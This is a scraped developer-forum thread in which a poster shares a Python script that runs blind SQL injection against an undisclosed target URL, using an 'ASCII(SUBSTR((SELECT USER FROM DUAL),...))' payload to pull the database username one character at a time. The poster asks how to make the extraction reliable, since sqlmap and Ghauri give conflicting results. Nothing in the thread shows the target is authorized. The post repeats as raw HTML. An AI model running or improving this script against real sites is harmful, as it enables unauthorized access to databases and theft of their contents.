OiO.lk Community platform!

Oio.lk is an excellent forum for developers, providing a wide range of resources, discussions, and support for those in the developer community. Join oio.lk today to connect with like-minded professionals, share insights, and stay updated on the latest trends and technologies in the development field.
  You need to log in or register to access the solved answers to this problem.
  • You have reached the maximum number of guest views allowed
  • Please register below to remove this limitation

Inconsistent SQL Injection Results with Manual Python Script and Tools

  • Thread starter Thread starter NIGHTMARE GAMING
  • Start date Start date
N

NIGHTMARE GAMING

Guest
I am trying to manually extract the current database user from a target URL using a Python script. To infer the characters of the username one by one. However, the results are inconsistent, and tools like Ghauri and SQLmap give different results.

Here is the Python script I am using:

Code:
    import requests

base_url = "can't give you for security purpose"

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
}

def check_character(position, ascii_value):
    payload = f'" AND ASCII(SUBSTR((SELECT USER FROM DUAL),{position},1))={ascii_value}-- wXyW'
    url = base_url + payload
    response = requests.get(url, headers=headers)
    return response.elapsed.total_seconds() > 1  # Adjust threshold as needed

def extract_user():
    user = ""
    for i in range(1, 21):  # Adjust range based on expected user length
        found_char = False
        for ascii_value in range(32, 127):  # ASCII printable characters
            if check_character(i, ascii_value):
                user += chr(ascii_value)
                found_char = True
                print(f"Found character: {chr(ascii_value)} at position {i}")
                break
        if not found_char:
            user += '?'
            print(f"No valid character found at position {i}, appending '?'")
    return user

current_user = extract_user()
print(f"Current user: {current_user}")

When I run this script, I get results like: Current user: +NPV$g(M}(+$m!D.

Also, Ghauri and SQLmap sometimes report different back-end DBMS types (Oracle, MySQL, etc.), and when I test the payload directly in the browser, it doesn't seem to trigger any changes.

What might be causing these inconsistent results, and how can I reliably extract the current database user using SQL injection?

Any help or insights would be greatly appreciated!
<p>I am trying to manually extract the current database user from a target URL using a Python script. To infer the characters of the username one by one. However, the results are inconsistent, and tools like Ghauri and SQLmap give different results.</p>
<p>Here is the Python script I am using:</p>
<pre><code> import requests

base_url = "can't give you for security purpose"

headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
}

def check_character(position, ascii_value):
payload = f'" AND ASCII(SUBSTR((SELECT USER FROM DUAL),{position},1))={ascii_value}-- wXyW'
url = base_url + payload
response = requests.get(url, headers=headers)
return response.elapsed.total_seconds() > 1 # Adjust threshold as needed

def extract_user():
user = ""
for i in range(1, 21): # Adjust range based on expected user length
found_char = False
for ascii_value in range(32, 127): # ASCII printable characters
if check_character(i, ascii_value):
user += chr(ascii_value)
found_char = True
print(f"Found character: {chr(ascii_value)} at position {i}")
break
if not found_char:
user += '?'
print(f"No valid character found at position {i}, appending '?'")
return user

current_user = extract_user()
print(f"Current user: {current_user}")
</code></pre>
<p>When I run this script, I get results like: Current user: +NPV$g(M}(+$m!D.</p>
<p>Also, Ghauri and SQLmap sometimes report different back-end DBMS types (Oracle, MySQL, etc.), and when I test the payload directly in the browser, it doesn't seem to trigger any changes.</p>
<p>What might be causing these inconsistent results, and how can I reliably extract the current database user using SQL injection?</p>
<p>Any help or insights would be greatly appreciated!</p>
 

Latest posts

Online statistics

Members online
1
Guests online
5
Total visitors
6
Top